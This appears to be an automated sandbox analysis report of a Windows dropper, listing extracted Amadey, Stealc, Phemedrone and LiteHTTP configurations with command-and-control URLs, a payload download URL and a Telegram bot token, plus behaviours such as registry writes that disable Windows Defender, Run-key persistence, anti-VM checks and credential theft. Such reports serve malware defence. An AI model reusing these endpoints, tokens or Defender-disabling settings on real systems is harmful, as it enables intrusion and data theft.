Analysis
-
max time kernel
147s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
05/03/2025, 17:09
Static task
static1
Behavioral task
behavioral1
Sample
0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe
Resource
win10v2004-20250217-en
General
-
Target
0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe
-
Size
1.8MB
-
MD5
f7a071c71dd7454582afb12eb5f488ca
-
SHA1
548af1bd92331df854dd8bd1d920601b9c7b4e96
-
SHA256
0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a
-
SHA512
491361ba6440c899756e1d486ea24c09d3c88fb9cd8d697a1bc88617fad522f297cdfce38d224bd6a0c3705b95ccb83eeee6216fd561332382286d448402af5c
-
SSDEEP
24576:8batnOjZKIChJftECqSwAKyG7ljmZK4X1943gyQHfXFxQCCBzxCcSUpxs:8baaZmFZ/w1R+zU3zQHfXbQPRou7s
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
phemedrone
https://api.telegram.org/bot8073216408:AAGdXWcCmxBIngZx-Z502Gat9NRWpLvPTxU/sendDocument
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/980-488-0x00000000008C0000-0x0000000000D2C000-memory.dmp healer behavioral1/memory/980-489-0x00000000008C0000-0x0000000000D2C000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Litehttp family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" ce0fdbb4c7.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" ce0fdbb4c7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" ce0fdbb4c7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" ce0fdbb4c7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" ce0fdbb4c7.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection ce0fdbb4c7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" ce0fdbb4c7.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" ce0fdbb4c7.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications ce0fdbb4c7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" ce0fdbb4c7.exe -
Phemedrone
An information and wallet stealer written in C#.
-
Phemedrone family
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempIYXCIKUJKM63MDSNYJIO2MQQJ31BIOFE.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5af08d2768.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 32d42439b0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4f7305716b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0f27b08ee4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FvbuInU.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d52ccaca11.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 70b73e7ec3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ce0fdbb4c7.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 6 3032 powershell.exe 7 1664 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 3032 powershell.exe 1664 powershell.exe 3212 powershell.exe 2424 powershell.exe 1572 powershell.exe 1944 powershell.exe -
Downloads MZ/PE file 15 IoCs
flow pid Process 138 2168 rapes.exe 5 2168 rapes.exe 5 2168 rapes.exe 5 2168 rapes.exe 5 2168 rapes.exe 5 2168 rapes.exe 5 2168 rapes.exe 5 2168 rapes.exe 145 2168 rapes.exe 145 2168 rapes.exe 145 2168 rapes.exe 145 2168 rapes.exe 6 3032 powershell.exe 7 1664 powershell.exe 55 2168 rapes.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x000b0000000193c7-792.dat net_reactor behavioral1/memory/788-800-0x00000000000C0000-0x0000000000120000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d52ccaca11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 32d42439b0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4f7305716b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 70b73e7ec3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ce0fdbb4c7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5af08d2768.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 32d42439b0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 70b73e7ec3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0f27b08ee4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempIYXCIKUJKM63MDSNYJIO2MQQJ31BIOFE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4f7305716b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ce0fdbb4c7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempIYXCIKUJKM63MDSNYJIO2MQQJ31BIOFE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5af08d2768.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d52ccaca11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0f27b08ee4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FvbuInU.exe -
Executes dropped EXE 31 IoCs
pid Process 2168 rapes.exe 896 b2a880b369.exe 2452 TempIYXCIKUJKM63MDSNYJIO2MQQJ31BIOFE.EXE 1780 pDZWk1j.exe 2996 pDZWk1j.exe 2960 dw4I35Ut3X.exe 2988 CnVf3x0mxd.exe 2704 483d2fa8a0d53818306efeb32d3.exe 1096 5af08d2768.exe 1132 7817fe6500.exe 1944 7817fe6500.exe 2692 d52ccaca11.exe 2304 32d42439b0.exe 2032 4f7305716b.exe 1444 ce4pMzk.exe 2068 70b73e7ec3.exe 2336 0f27b08ee4.exe 1772 49f4ed094b.exe 980 ce0fdbb4c7.exe 3392 joblam.exe 3484 pDZWk1j.exe 3548 pDZWk1j.exe 3676 xaGMTokN7L.exe 3692 BSVOQewEKZ.exe 788 mAtJWNv.exe 3480 mAtJWNv.exe 3992 SvhQA35.exe 3292 chromium.exe 3736 FvbuInU.exe 3300 Ps7WqSx.exe 2452 zY9sqWs.exe -
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 5af08d2768.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 70b73e7ec3.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 0f27b08ee4.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine ce0fdbb4c7.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine d52ccaca11.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 32d42439b0.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 4f7305716b.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine FvbuInU.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine TempIYXCIKUJKM63MDSNYJIO2MQQJ31BIOFE.EXE Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe -
Loads dropped DLL 64 IoCs
pid Process 2596 0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe 2168 rapes.exe 3032 powershell.exe 3032 powershell.exe 2168 rapes.exe 2168 rapes.exe 1780 pDZWk1j.exe 3068 WerFault.exe 3068 WerFault.exe 2996 pDZWk1j.exe 3068 WerFault.exe 1664 powershell.exe 1664 powershell.exe 2168 rapes.exe 2168 rapes.exe 2168 rapes.exe 1132 7817fe6500.exe 2288 WerFault.exe 2288 WerFault.exe 2288 WerFault.exe 2288 WerFault.exe 2288 WerFault.exe 664 WerFault.exe 664 WerFault.exe 664 WerFault.exe 664 WerFault.exe 664 WerFault.exe 2168 rapes.exe 2168 rapes.exe 2168 rapes.exe 2168 rapes.exe 2168 rapes.exe 2168 rapes.exe 2168 rapes.exe 2240 BitLockerToGo.exe 2168 rapes.exe 2168 rapes.exe 1216 WerFault.exe 1216 WerFault.exe 1216 WerFault.exe 2168 rapes.exe 2168 rapes.exe 2168 rapes.exe 2168 rapes.exe 2168 rapes.exe 1204 BitLockerToGo.exe 2168 rapes.exe 2168 rapes.exe 2168 rapes.exe 3484 pDZWk1j.exe 3612 WerFault.exe 3612 WerFault.exe 3612 WerFault.exe 3548 pDZWk1j.exe 2168 rapes.exe 2168 rapes.exe 788 mAtJWNv.exe 3620 WerFault.exe 3620 WerFault.exe 3620 WerFault.exe 2168 rapes.exe 3992 SvhQA35.exe 3292 chromium.exe 2168 rapes.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features ce0fdbb4c7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" ce0fdbb4c7.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\0f27b08ee4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104930101\\0f27b08ee4.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\xYYgnj9o\\Anubis.exe\"" ce4pMzk.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\49f4ed094b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104940101\\49f4ed094b.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\ce0fdbb4c7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104950101\\ce0fdbb4c7.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\b2a880b369.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104610101\\b2a880b369.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104620121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\70b73e7ec3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104920101\\70b73e7ec3.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000600000001948c-28.dat autoit_exe behavioral1/files/0x000500000001c539-446.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid Process 2596 0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe 2168 rapes.exe 2452 TempIYXCIKUJKM63MDSNYJIO2MQQJ31BIOFE.EXE 2704 483d2fa8a0d53818306efeb32d3.exe 1096 5af08d2768.exe 2692 d52ccaca11.exe 2304 32d42439b0.exe 2032 4f7305716b.exe 2068 70b73e7ec3.exe 2336 0f27b08ee4.exe 980 ce0fdbb4c7.exe 3736 FvbuInU.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 1132 set thread context of 1944 1132 7817fe6500.exe 64 PID 1096 set thread context of 2240 1096 5af08d2768.exe 67 PID 2692 set thread context of 1204 2692 d52ccaca11.exe 71 PID 3484 set thread context of 3548 3484 pDZWk1j.exe 103 PID 788 set thread context of 3480 788 mAtJWNv.exe 111 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job 0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
pid pid_target Process procid_target 3068 1780 WerFault.exe 53 2288 1132 WerFault.exe 63 664 1944 WerFault.exe 64 1216 2068 WerFault.exe 76 3612 3484 WerFault.exe 101 3620 788 WerFault.exe 110 -
System Location Discovery: System Language Discovery 1 TTPs 46 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d52ccaca11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 49f4ed094b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ce0fdbb4c7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FvbuInU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pDZWk1j.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pDZWk1j.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7817fe6500.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 70b73e7ec3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pDZWk1j.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 32d42439b0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 49f4ed094b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pDZWk1j.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 49f4ed094b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b2a880b369.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7817fe6500.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0f27b08ee4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5af08d2768.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4f7305716b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ps7WqSx.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2200 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 1840 taskkill.exe 2368 taskkill.exe 2228 taskkill.exe 2408 taskkill.exe 692 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 5 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 32d42439b0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 4f7305716b.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d4203